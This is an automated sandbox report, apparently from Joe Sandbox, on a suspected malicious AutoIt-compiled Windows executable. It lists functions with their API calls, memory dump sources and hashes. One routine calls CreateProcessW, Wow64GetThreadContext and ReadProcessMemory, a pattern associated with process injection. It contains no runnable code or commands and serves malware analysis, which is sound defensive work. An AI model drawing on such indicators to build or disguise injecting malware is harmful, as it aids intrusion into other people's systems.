                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1e6b2ec7839f0ea0abaef410663ed5661fe76669bd8811d2459c05bec068b28d
                                                                                                                      • Instruction ID: d7d49f78f55269d65fa288cf13b7dc4f616ceea8bac948989a296c5284f4f869
                                                                                                                      • Opcode Fuzzy Hash: 1e6b2ec7839f0ea0abaef410663ed5661fe76669bd8811d2459c05bec068b28d
                                                                                                                      • Instruction Fuzzy Hash: B6F15675A083419FCB14DF29C484A6ABBE5FF88318F14892EF8999B351D734E945CF82
                                                                                                                      Function 004C434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 004C4370
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 004C4415
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 004C4432
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconNotifyShell_$_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1505330794-0
                                                                                                                      • Opcode ID: a5afe149f5cb4efe50620f9c8986a1d839511eb0ce0e184383eeb05cb5c886b8
                                                                                                                      • Instruction ID: 6c5f9e09722e496ce5c03d28bc184c911f47de59a143dc3fadc211f5fe89dc3c
                                                                                                                      • Opcode Fuzzy Hash: a5afe149f5cb4efe50620f9c8986a1d839511eb0ce0e184383eeb05cb5c886b8
                                                                                                                      • Instruction Fuzzy Hash: 7231E5745047018FC760DF24D984B9BBBF8FB98308F00092FE99A92351E7756948CB56
                                                                                                                      Function 004E571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __FF_MSGBANNER.LIBCMT ref: 004E5733
                                                                                                                        • Part of subcall function 004EA16B: __NMSG_WRITE.LIBCMT ref: 004EA192
                                                                                                                        • Part of subcall function 004EA16B: __NMSG_WRITE.LIBCMT ref: 004EA19C
                                                                                                                      • __NMSG_WRITE.LIBCMT ref: 004E573A
                                                                                                                        • Part of subcall function 004EA1C8: GetModuleFileNameW.KERNEL32(00000000,005833BA,00000104,?,00000001,00000000), ref: 004EA25A
                                                                                                                        • Part of subcall function 004EA1C8: ___crtMessageBoxW.LIBCMT ref: 004EA308
                                                                                                                        • Part of subcall function 004E309F: ___crtCorExitProcess.LIBCMT ref: 004E30A5
                                                                                                                        • Part of subcall function 004E309F: ExitProcess.KERNEL32 ref: 004E30AE
                                                                                                                        • Part of subcall function 004E8B28: __getptd_noexit.LIBCMT ref: 004E8B28
                                                                                                                      • RtlAllocateHeap.NTDLL(01070000,00000000,00000001,00000000,?,?,?,004E0DD3,?), ref: 004E575F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1372826849-0
                                                                                                                      • Opcode ID: 1eb402016f97ab9e363046b9a500e3d8297a8e422949502b65a7abbc0fe9cc4c
                                                                                                                      • Instruction ID: ef35e0e250b9844cdb0443c893120d1015fa89810cd9b23a1a1c60ca4d11e3e4
                                                                                                                      • Opcode Fuzzy Hash: 1eb402016f97ab9e363046b9a500e3d8297a8e422949502b65a7abbc0fe9cc4c
                                                                                                                      • Instruction Fuzzy Hash: A901F935200B91DED6112B77EC42A2E77488F9276FF11042FF805A7281DE7C9C11976D
                                                                                                                      Function 005298A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00529548,?,?,?,?,?,00000004), ref: 005298BB
                                                                                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00529548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 005298D1
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00529548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 005298D8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CloseCreateHandleTime
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3397143404-0
                                                                                                                      • Opcode ID: 47b4cea87f0c1fedc2208a124ba388f014009e56db46fd6e09479a258f2deaac
                                                                                                                      • Instruction ID: 7ae979cceaa515749f06db756de94afed335c2d8a69d67483ee5361f63cf1d4d
                                                                                                                      • Opcode Fuzzy Hash: 47b4cea87f0c1fedc2208a124ba388f014009e56db46fd6e09479a258f2deaac
                                                                                                                      • Instruction Fuzzy Hash: CDE08636140224B7D7211F68EC09FCA7F59AB17B65F144120FB14690E087B12515A798
                                                                                                                      Function 00528D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00528D1B
                                                                                                                        • Part of subcall function 004E2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,004E9A24), ref: 004E2D69
                                                                                                                        • Part of subcall function 004E2D55: GetLastError.KERNEL32(00000000,?,004E9A24), ref: 004E2D7B
                                                                                                                      • _free.LIBCMT ref: 00528D2C
                                                                                                                      • _free.LIBCMT ref: 00528D3E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                      • Instruction ID: ed5c738872973a29923d8f93796e179b73a3c452601aeae5747d2bb29b69d122
                                                                                                                      • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                                                      • Instruction Fuzzy Hash: F7E0C2A1A0265282CB24A5BABE40FA313DC5F48357704080EB50DD71C6CEA8F8428028
                                                                                                                      Function 004CA9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CALL
                                                                                                                      • API String ID: 0-4196123274
                                                                                                                      • Opcode ID: fd06b43037fc67edc5e850b0b6baea3deadeabe914033a803696f3a26e94db75
                                                                                                                      • Instruction ID: 624c226bbe3f4249722538fb959e5768844ecf34f7b905885bedf7592e0cd489
                                                                                                                      • Opcode Fuzzy Hash: fd06b43037fc67edc5e850b0b6baea3deadeabe914033a803696f3a26e94db75
                                                                                                                      • Instruction Fuzzy Hash: B5226978508205DFD764DF14C495F2ABBE1BF84308F14896EE88A8B361D739EC45CB8A
                                                                                                                      Function 004C7A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104443479-0
                                                                                                                      • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                                                                      • Instruction ID: 5edda051124dc71c0cedc3e8f5f45716be4710d0d82c709adab0baef84c7a2f6
                                                                                                                      • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                                                                      • Instruction Fuzzy Hash: 4D31E7B5600606AFC744CF69C8D1E69B3A4FF48314714822EE519CB391EB75ED50CF94
                                                                                                                      Function 004C47D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsThemeActive.UXTHEME ref: 004C4834
                                                                                                                        • Part of subcall function 004E336C: __lock.LIBCMT ref: 004E3372
                                                                                                                        • Part of subcall function 004E336C: DecodePointer.KERNEL32(00000001,?,004C4849,00517C74), ref: 004E337E
                                                                                                                        • Part of subcall function 004E336C: EncodePointer.KERNEL32(?,?,004C4849,00517C74), ref: 004E3389
                                                                                                                        • Part of subcall function 004C48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 004C4915
                                                                                                                        • Part of subcall function 004C48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 004C492A
                                                                                                                        • Part of subcall function 004C3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004C3B68
                                                                                                                        • Part of subcall function 004C3B3A: IsDebuggerPresent.KERNEL32 ref: 004C3B7A
                                                                                                                        • Part of subcall function 004C3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,005852F8,005852E0,?,?), ref: 004C3BEB
                                                                                                                        • Part of subcall function 004C3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 004C3C6F
                                                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 004C4874
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1438897964-0
                                                                                                                      • Opcode ID: 947e1c6b9f73b1e71b83d5a24a39e0cc750fc5b5e0b0d8d4744b9f1b0294c4cc
                                                                                                                      • Instruction ID: efc5f0c303a2f58dd813d812b1ceb3cd571fe32ba37e34520ffa6504b296a5ba
                                                                                                                      • Opcode Fuzzy Hash: 947e1c6b9f73b1e71b83d5a24a39e0cc750fc5b5e0b0d8d4744b9f1b0294c4cc
                                                                                                                      • Instruction Fuzzy Hash: 7611AE758043419BD700EF2AD845A0EBFE8EBA5754F00451FF841A3271DB749948DB96
                                                                                                                      Function 004E0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004E571C: __FF_MSGBANNER.LIBCMT ref: 004E5733
                                                                                                                        • Part of subcall function 004E571C: __NMSG_WRITE.LIBCMT ref: 004E573A
                                                                                                                        • Part of subcall function 004E571C: RtlAllocateHeap.NTDLL(01070000,00000000,00000001,00000000,?,?,?,004E0DD3,?), ref: 004E575F
                                                                                                                      • std::exception::exception.LIBCMT ref: 004E0DEC
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 004E0E01
                                                                                                                        • Part of subcall function 004E859B: RaiseException.KERNEL32(?,?,?,00579E78,00000000,?,?,?,?,004E0E06,?,00579E78,?,00000001), ref: 004E85F0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3902256705-0
                                                                                                                      • Opcode ID: f2bbfee96f6640d684ad07e13e1ee6ac3518681c1fdbf1145a2f79c94fa9736b
                                                                                                                      • Instruction ID: a263a8628ee80c652cdad81554cda10b01a618e3be31b287b91f09290579dfd5
                                                                                                                      • Opcode Fuzzy Hash: f2bbfee96f6640d684ad07e13e1ee6ac3518681c1fdbf1145a2f79c94fa9736b
                                                                                                                      • Instruction Fuzzy Hash: C3F0F43140025A66CB10BA9BEC119DF7BACEF01317F10042FFD1896281EFB49A8583D9
                                                                                                                      Function 004E53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004E8B28: __getptd_noexit.LIBCMT ref: 004E8B28
                                                                                                                      • __lock_file.LIBCMT ref: 004E53EB
                                                                                                                        • Part of subcall function 004E6C11: __lock.LIBCMT ref: 004E6C34
                                                                                                                      • __fclose_nolock.LIBCMT ref: 004E53F6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2800547568-0
                                                                                                                      • Opcode ID: 865a662af0a8640df6f7f734aa51bb5d117321322f8adc711c40b0b037b8b877
                                                                                                                      • Instruction ID: 4bc8e800e64bb2b5035d3f1124d463180bb6f41c34d8bde8e116d397b96645d5
                                                                                                                      • Opcode Fuzzy Hash: 865a662af0a8640df6f7f734aa51bb5d117321322f8adc711c40b0b037b8b877
                                                                                                                      • Instruction Fuzzy Hash: 3DF09671800A849ADB106B6798057AE77A06F4137FF21820FA828EB1C1CFBC49419B5A
                                                                                                                      Function 0110710D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 011078CB
                                                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01107961
                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01107983
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2176622884.0000000001105000.00000040.00000020.00020000.00000000.sdmp, Offset: 01105000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1105000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2438371351-0
                                                                                                                      • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                                      • Instruction ID: 9a78ad479439329b156fa90c4d21911ebac18a4f4dfffe35eb3990575809c23b
                                                                                                                      • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                                      • Instruction Fuzzy Hash: 4F12CC24E24658C6EB24DF64D8507DEB232EF68300F1090E9D10DEB7E5E77A5E81CB5A
                                                                                                                      Function 004E0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ProtectVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 544645111-0
                                                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                      • Instruction ID: 3cefd04f657a296c10769d50e434f165c91ec9bf0b779cc14267c9890b42eb8e
                                                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                      • Instruction Fuzzy Hash: 9B311570A001459BC71CDF0AC48496AF7A2FB49301B3487A6E81ACB355D7B5EDC2DBC9
                                                                                                                      Function 004FFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1473721057-0
                                                                                                                      • Opcode ID: f48fb62b20541c78c2a342e179abe371f5397a305d9e37625cc97336476177a5
                                                                                                                      • Instruction ID: a9221c3bea8a3f6eb6541fd17dcc1ea454cf8856eb121dd01b112190017e44c3
                                                                                                                      • Opcode Fuzzy Hash: f48fb62b20541c78c2a342e179abe371f5397a305d9e37625cc97336476177a5
                                                                                                                      • Instruction Fuzzy Hash: 954125745043409FDB14CF18C448F1ABBE1BF45318F0988ADE89A8B362C77AE845CB86
                                                                                                                      Function 004C7B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104443479-0
                                                                                                                      • Opcode ID: 0198539f3ae49afb9957ff804e601377d0f2fc917caa5570bdbeee7bbd527d28
                                                                                                                      • Instruction ID: 74c2644fbd599cc63df15076c7c606a416f855cebf3b1f3bb92b54cc0cc7ea8f
                                                                                                                      • Opcode Fuzzy Hash: 0198539f3ae49afb9957ff804e601377d0f2fc917caa5570bdbeee7bbd527d28
                                                                                                                      • Instruction Fuzzy Hash: D7212772A04A08EBDB144F17F841B797BB8FB24355F20842FF98AC51A0EB7495D0E75A
                                                                                                                      Function 004C4DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 004C4BEF
                                                                                                                        • Part of subcall function 004E525B: __wfsopen.LIBCMT ref: 004E5266
                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 004C4E0F
                                                                                                                        • Part of subcall function 004C4B6A: FreeLibrary.KERNEL32(00000000), ref: 004C4BA4
                                                                                                                        • Part of subcall function 004C4C70: _memmove.LIBCMT ref: 004C4CBA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1396898556-0
                                                                                                                      • Opcode ID: 6b7f31a616addb23c862b8e5fccea1181c0120e18f4dac539102cc59179dbb18
                                                                                                                      • Instruction ID: b8e5d808f6ce7ccb992bd1846b13141e1bddf61c5d1c7717f2be55d3e3b39b59
                                                                                                                      • Opcode Fuzzy Hash: 6b7f31a616addb23c862b8e5fccea1181c0120e18f4dac539102cc59179dbb18
                                                                                                                      • Instruction Fuzzy Hash: 6A115B35A00205A7CF14BFB1CD22FAE77A4AFC0708F10842FF941A7181EA789D009759
                                                                                                                      Function 004FFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                      Download Yara Rule
